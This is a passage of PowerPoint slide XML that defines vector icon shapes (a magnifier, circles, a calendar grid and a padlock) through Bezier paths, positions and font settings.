                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="0"/>
                  <a:pt x="50" y="11"/>
                  <a:pt x="50" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="30"/>
                  <a:pt x="48" y="35"/>
                  <a:pt x="46" y="39"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="52"/>
                  <a:pt x="58" y="52"/>
                  <a:pt x="58" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="52"/>
                  <a:pt x="59" y="54"/>
                  <a:pt x="59" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="57"/>
                  <a:pt x="57" y="59"/>
                  <a:pt x="55" y="59"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="25" y="9"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="9"/>
                  <a:pt x="9" y="16"/>
                  <a:pt x="9" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="34"/>
                  <a:pt x="16" y="41"/>
                  <a:pt x="25" y="41"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="41"/>
                  <a:pt x="41" y="34"/>
                  <a:pt x="41" y="25"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="16"/>
                  <a:pt x="34" y="9"/>
                  <a:pt x="25" y="9"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="36" y="26"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="27"/>
                  <a:pt x="36" y="27"/>
                  <a:pt x="35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4" y="27"/>
                  <a:pt x="13" y="27"/>
                  <a:pt x="13" y="26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3"/>
                  <a:pt x="14" y="23"/>
                  <a:pt x="15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3"/>
                  <a:pt x="36" y="23"/>
                  <a:pt x="36" y="24"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36" y="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F57E1389-E21F-4736-AF4C-D2043C528FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8838900" y="2978697"/>
            <a:ext cx="648000" cy="648000"/>
            <a:chOff x="8859582" y="2971800"/>
            <a:chExt cx="648000" cy="648000"/>
          </a:xfrm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97A7497D-1D30-4EB6-992D-3A43A1F95703}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8859582" y="2971800"/>
              <a:ext cx="648000" cy="648000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="195927" h="195927">
                  <a:moveTo>
                    <a:pt x="97964" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116200" y="208"/>
                    <a:pt x="132679" y="4667"/>
                    <a:pt x="147399" y="13379"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162120" y="22090"/>
                    <a:pt x="173837" y="33807"/>
                    <a:pt x="182548" y="48528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191260" y="63248"/>
                    <a:pt x="195719" y="79727"/>
                    <a:pt x="195927" y="97963"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195719" y="116199"/>
                    <a:pt x="191260" y="132677"/>
                    <a:pt x="182548" y="147398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173837" y="162119"/>
                    <a:pt x="162120" y="173836"/>
                    <a:pt x="147399" y="182547"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132679" y="191259"/>
                    <a:pt x="116200" y="195719"/>
                    <a:pt x="97964" y="195927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79728" y="195719"/>
                    <a:pt x="63250" y="191259"/>
                    <a:pt x="48529" y="182547"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33808" y="173836"/>
                    <a:pt x="22091" y="162119"/>
                    <a:pt x="13380" y="147398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4668" y="132677"/>
                    <a:pt x="208" y="116199"/>
                    <a:pt x="0" y="97963"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="79727"/>
                    <a:pt x="4668" y="63248"/>
                    <a:pt x="13380" y="48528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22091" y="33807"/>
                    <a:pt x="33808" y="22090"/>
                    <a:pt x="48529" y="13379"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63250" y="4667"/>
                    <a:pt x="79728" y="208"/>
                    <a:pt x="979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914217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1828434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2742651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3656868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4571086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5485303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6399520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7313737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609539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tr-TR" sz="120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41" name="Freeform 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA77C090-3745-4EE0-8227-7312D6908F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18793" y="3135011"/>
              <a:ext cx="329579" cy="321578"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 200226 w 63"/>
                <a:gd name="T1" fmla="*/ 233362 h 68"/>
                <a:gd name="T2" fmla="*/ 0 w 63"/>
                <a:gd name="T3" fmla="*/ 216203 h 68"/>
                <a:gd name="T4" fmla="*/ 17261 w 63"/>
                <a:gd name="T5" fmla="*/ 0 h 68"/>
                <a:gd name="T6" fmla="*/ 217487 w 63"/>
                <a:gd name="T7" fmla="*/ 17159 h 68"/>
                <a:gd name="T8" fmla="*/ 200226 w 63"/>
                <a:gd name="T9" fmla="*/ 24023 h 68"/>
                <a:gd name="T10" fmla="*/ 24165 w 63"/>
                <a:gd name="T11" fmla="*/ 17159 h 68"/>
                <a:gd name="T12" fmla="*/ 17261 w 63"/>
                <a:gd name="T13" fmla="*/ 58341 h 68"/>
                <a:gd name="T14" fmla="*/ 193322 w 63"/>
                <a:gd name="T15" fmla="*/ 65204 h 68"/>
                <a:gd name="T16" fmla="*/ 200226 w 63"/>
                <a:gd name="T17" fmla="*/ 24023 h 68"/>
                <a:gd name="T18" fmla="*/ 17261 w 63"/>
                <a:gd name="T19" fmla="*/ 99522 h 68"/>
                <a:gd name="T20" fmla="*/ 48330 w 63"/>
                <a:gd name="T21" fmla="*/ 99522 h 68"/>
                <a:gd name="T22" fmla="*/ 31070 w 63"/>
                <a:gd name="T23" fmla="*/ 133840 h 68"/>
                <a:gd name="T24" fmla="*/ 31070 w 63"/>
                <a:gd name="T25" fmla="*/ 164726 h 68"/>
                <a:gd name="T26" fmla="*/ 31070 w 63"/>
                <a:gd name="T27" fmla="*/ 133840 h 68"/>
                <a:gd name="T28" fmla="*/ 17261 w 63"/>
                <a:gd name="T29" fmla="*/ 199044 h 68"/>
                <a:gd name="T30" fmla="*/ 48330 w 63"/>
                <a:gd name="T31" fmla="*/ 199044 h 68"/>
                <a:gd name="T32" fmla="*/ 82852 w 63"/>
                <a:gd name="T33" fmla="*/ 82363 h 68"/>
                <a:gd name="T34" fmla="*/ 82852 w 63"/>
                <a:gd name="T35" fmla="*/ 116681 h 68"/>
                <a:gd name="T36" fmla="*/ 82852 w 63"/>
                <a:gd name="T37" fmla="*/ 82363 h 68"/>
                <a:gd name="T38" fmla="*/ 65591 w 63"/>
                <a:gd name="T39" fmla="*/ 147567 h 68"/>
                <a:gd name="T40" fmla="*/ 100113 w 63"/>
                <a:gd name="T41" fmla="*/ 147567 h 68"/>
                <a:gd name="T42" fmla="*/ 82852 w 63"/>
                <a:gd name="T43" fmla="*/ 181885 h 68"/>
                <a:gd name="T44" fmla="*/ 82852 w 63"/>
                <a:gd name="T45" fmla="*/ 216203 h 68"/>
                <a:gd name="T46" fmla="*/ 82852 w 63"/>
                <a:gd name="T47" fmla="*/ 181885 h 68"/>
                <a:gd name="T48" fmla="*/ 117374 w 63"/>
                <a:gd name="T49" fmla="*/ 99522 h 68"/>
                <a:gd name="T50" fmla="*/ 148444 w 63"/>
                <a:gd name="T51" fmla="*/ 99522 h 68"/>
                <a:gd name="T52" fmla="*/ 134635 w 63"/>
                <a:gd name="T53" fmla="*/ 133840 h 68"/>
                <a:gd name="T54" fmla="*/ 134635 w 63"/>
                <a:gd name="T55" fmla="*/ 164726 h 68"/>
                <a:gd name="T56" fmla="*/ 134635 w 63"/>
                <a:gd name="T57" fmla="*/ 133840 h 68"/>
                <a:gd name="T58" fmla="*/ 117374 w 63"/>
                <a:gd name="T59" fmla="*/ 199044 h 68"/>
                <a:gd name="T60" fmla="*/ 148444 w 63"/>
                <a:gd name="T61" fmla="*/ 199044 h 68"/>
                <a:gd name="T62" fmla="*/ 182965 w 63"/>
                <a:gd name="T63" fmla="*/ 82363 h 68"/>
                <a:gd name="T64" fmla="*/ 182965 w 63"/>
                <a:gd name="T65" fmla="*/ 116681 h 68"/>
                <a:gd name="T66" fmla="*/ 182965 w 63"/>
                <a:gd name="T67" fmla="*/ 82363 h 68"/>
                <a:gd name="T68" fmla="*/ 182965 w 63"/>
                <a:gd name="T69" fmla="*/ 133840 h 68"/>
                <a:gd name="T70" fmla="*/ 165704 w 63"/>
                <a:gd name="T71" fmla="*/ 199044 h 68"/>
                <a:gd name="T72" fmla="*/ 200226 w 63"/>
                <a:gd name="T73" fmla="*/ 199044 h 6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3" h="68">
                  <a:moveTo>
                    <a:pt x="63" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="66"/>
                    <a:pt x="61" y="68"/>
                    <a:pt x="58" y="68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2" y="68"/>
                    <a:pt x="0" y="66"/>
                    <a:pt x="0" y="6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1" y="0"/>
                    <a:pt x="63" y="2"/>
                    <a:pt x="63" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="63"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="58" y="7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="6"/>
                    <a:pt x="57" y="5"/>
                    <a:pt x="56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8"/>
                    <a:pt x="6" y="19"/>
                    <a:pt x="7" y="19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7" y="19"/>
                    <a:pt x="58" y="18"/>
                    <a:pt x="58" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="58" y="7"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="24"/>
                    <a:pt x="5" y="26"/>
                    <a:pt x="5" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="32"/>
                    <a:pt x="7" y="34"/>
                    <a:pt x="9" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="34"/>
                    <a:pt x="14" y="32"/>
                    <a:pt x="14" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="26"/>
                    <a:pt x="12" y="24"/>
                    <a:pt x="9" y="24"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9" y="39"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="39"/>
                    <a:pt x="5" y="41"/>
                    <a:pt x="5" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="46"/>
                    <a:pt x="7" y="48"/>
                    <a:pt x="9" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="48"/>
                    <a:pt x="14" y="46"/>
                    <a:pt x="14" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="41"/>
                    <a:pt x="12" y="39"/>
                    <a:pt x="9" y="39"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="53"/>
                    <a:pt x="5" y="55"/>
                    <a:pt x="5" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="61"/>
                    <a:pt x="7" y="63"/>
                    <a:pt x="9" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="63"/>
                    <a:pt x="14" y="61"/>
                    <a:pt x="14" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="55"/>
                    <a:pt x="12" y="53"/>
                    <a:pt x="9" y="53"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="24"/>
                    <a:pt x="19" y="26"/>
                    <a:pt x="19" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="32"/>
                    <a:pt x="21" y="34"/>
                    <a:pt x="24" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="34"/>
                    <a:pt x="29" y="32"/>
                    <a:pt x="29" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="26"/>
                    <a:pt x="27" y="24"/>
                    <a:pt x="24" y="24"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24" y="39"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="39"/>
                    <a:pt x="19" y="41"/>
                    <a:pt x="19" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="46"/>
                    <a:pt x="21" y="48"/>
                    <a:pt x="24" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="48"/>
                    <a:pt x="29" y="46"/>
                    <a:pt x="29" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="41"/>
                    <a:pt x="27" y="39"/>
                    <a:pt x="24" y="39"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="53"/>
                    <a:pt x="19" y="55"/>
                    <a:pt x="19" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="61"/>
                    <a:pt x="21" y="63"/>
                    <a:pt x="24" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="63"/>
                    <a:pt x="29" y="61"/>
                    <a:pt x="29" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="55"/>
                    <a:pt x="27" y="53"/>
                    <a:pt x="24" y="53"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="39" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="24"/>
                    <a:pt x="34" y="26"/>
                    <a:pt x="34" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="32"/>
                    <a:pt x="36" y="34"/>
                    <a:pt x="39" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="34"/>
                    <a:pt x="43" y="32"/>
                    <a:pt x="43" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="26"/>
                    <a:pt x="41" y="24"/>
                    <a:pt x="39" y="24"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="39" y="39"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="39"/>
                    <a:pt x="34" y="41"/>
                    <a:pt x="34" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="46"/>
                    <a:pt x="36" y="48"/>
                    <a:pt x="39" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="48"/>
                    <a:pt x="43" y="46"/>
                    <a:pt x="43" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="41"/>
                    <a:pt x="41" y="39"/>
                    <a:pt x="39" y="39"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="39" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="53"/>
                    <a:pt x="34" y="55"/>
                    <a:pt x="34" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="61"/>
                    <a:pt x="36" y="63"/>
                    <a:pt x="39" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="63"/>
                    <a:pt x="43" y="61"/>
                    <a:pt x="43" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="55"/>
                    <a:pt x="41" y="53"/>
                    <a:pt x="39" y="53"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="53" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="24"/>
                    <a:pt x="48" y="26"/>
                    <a:pt x="48" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="32"/>
                    <a:pt x="51" y="34"/>
                    <a:pt x="53" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="34"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="26"/>
                    <a:pt x="56" y="24"/>
                    <a:pt x="53" y="24"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="58" y="43"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="41"/>
                    <a:pt x="56" y="39"/>
                    <a:pt x="53" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="39"/>
                    <a:pt x="48" y="41"/>
                    <a:pt x="48" y="43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8" y="61"/>
                    <a:pt x="51" y="63"/>
                    <a:pt x="53" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="63"/>
                    <a:pt x="58" y="61"/>
                    <a:pt x="58" y="58"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="58" y="4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1828434" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="3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914217" algn="l" defTabSz="1828434" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="3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828434" algn="l" defTabSz="1828434" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="3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2742651" algn="l" defTabSz="1828434" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="3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3656868" algn="l" defTabSz="1828434" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="3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4571086" algn="l" defTabSz="1828434" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="3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5485303" algn="l" defTabSz="1828434" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="3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6399520" algn="l" defTabSz="1828434" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="3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7313737" algn="l" defTabSz="1828434" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="3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/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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AFC19124-CC80-4419-9119-6F6B237B457D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8838900" y="4800600"/>
            <a:ext cx="648000" cy="648000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="195927" h="195927">
                <a:moveTo>
                  <a:pt x="97964" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="116200" y="208"/>
                  <a:pt x="132679" y="4667"/>
                  <a:pt x="147399" y="13379"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162120" y="22090"/>
                  <a:pt x="173837" y="33807"/>
                  <a:pt x="182548" y="48528"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="191260" y="63248"/>
                  <a:pt x="195719" y="79727"/>
                  <a:pt x="195927" y="97963"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195719" y="116199"/>
                  <a:pt x="191260" y="132677"/>
                  <a:pt x="182548" y="147398"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173837" y="162119"/>
                  <a:pt x="162120" y="173836"/>
                  <a:pt x="147399" y="182547"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132679" y="191259"/>
                  <a:pt x="116200" y="195719"/>
                  <a:pt x="97964" y="195927"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79728" y="195719"/>
                  <a:pt x="63250" y="191259"/>
                  <a:pt x="48529" y="182547"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33808" y="173836"/>
                  <a:pt x="22091" y="162119"/>
                  <a:pt x="13380" y="147398"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4668" y="132677"/>
                  <a:pt x="208" y="116199"/>
                  <a:pt x="0" y="97963"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="208" y="79727"/>
                  <a:pt x="4668" y="63248"/>
                  <a:pt x="13380" y="48528"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22091" y="33807"/>
                  <a:pt x="33808" y="22090"/>
                  <a:pt x="48529" y="13379"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63250" y="4667"/>
                  <a:pt x="79728" y="208"/>
                  <a:pt x="97964" y="0"/>
                </a:cubicBez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609539" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="1200">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Freeform 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2662484A-61EF-4039-B47F-5776C7091327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9003122" y="4939965"/>
            <a:ext cx="343502" cy="369270"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="180" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="167" y="34"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="133" y="7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="62" y="14"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="35" y="47"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="132"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="17" y="136"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="156"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="8" y="295"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="286"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="207" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="150"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="134"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="51" y="54"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="71" y="29"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="20"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="125" y="24"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="151" y="45"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="160" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="187" y="279"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="180" y="285"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="24" y="283"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="158"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="183" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="189" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="113" y="190"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="111" y="183"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="179"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="187"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="212"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="223"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="236"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="246"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="241"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="122" y="228"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="214"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="207" h="303">
                <a:moveTo>
                  <a:pt x="180" y="132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="150"/>
                </a:lnTo>
                <a:lnTo>
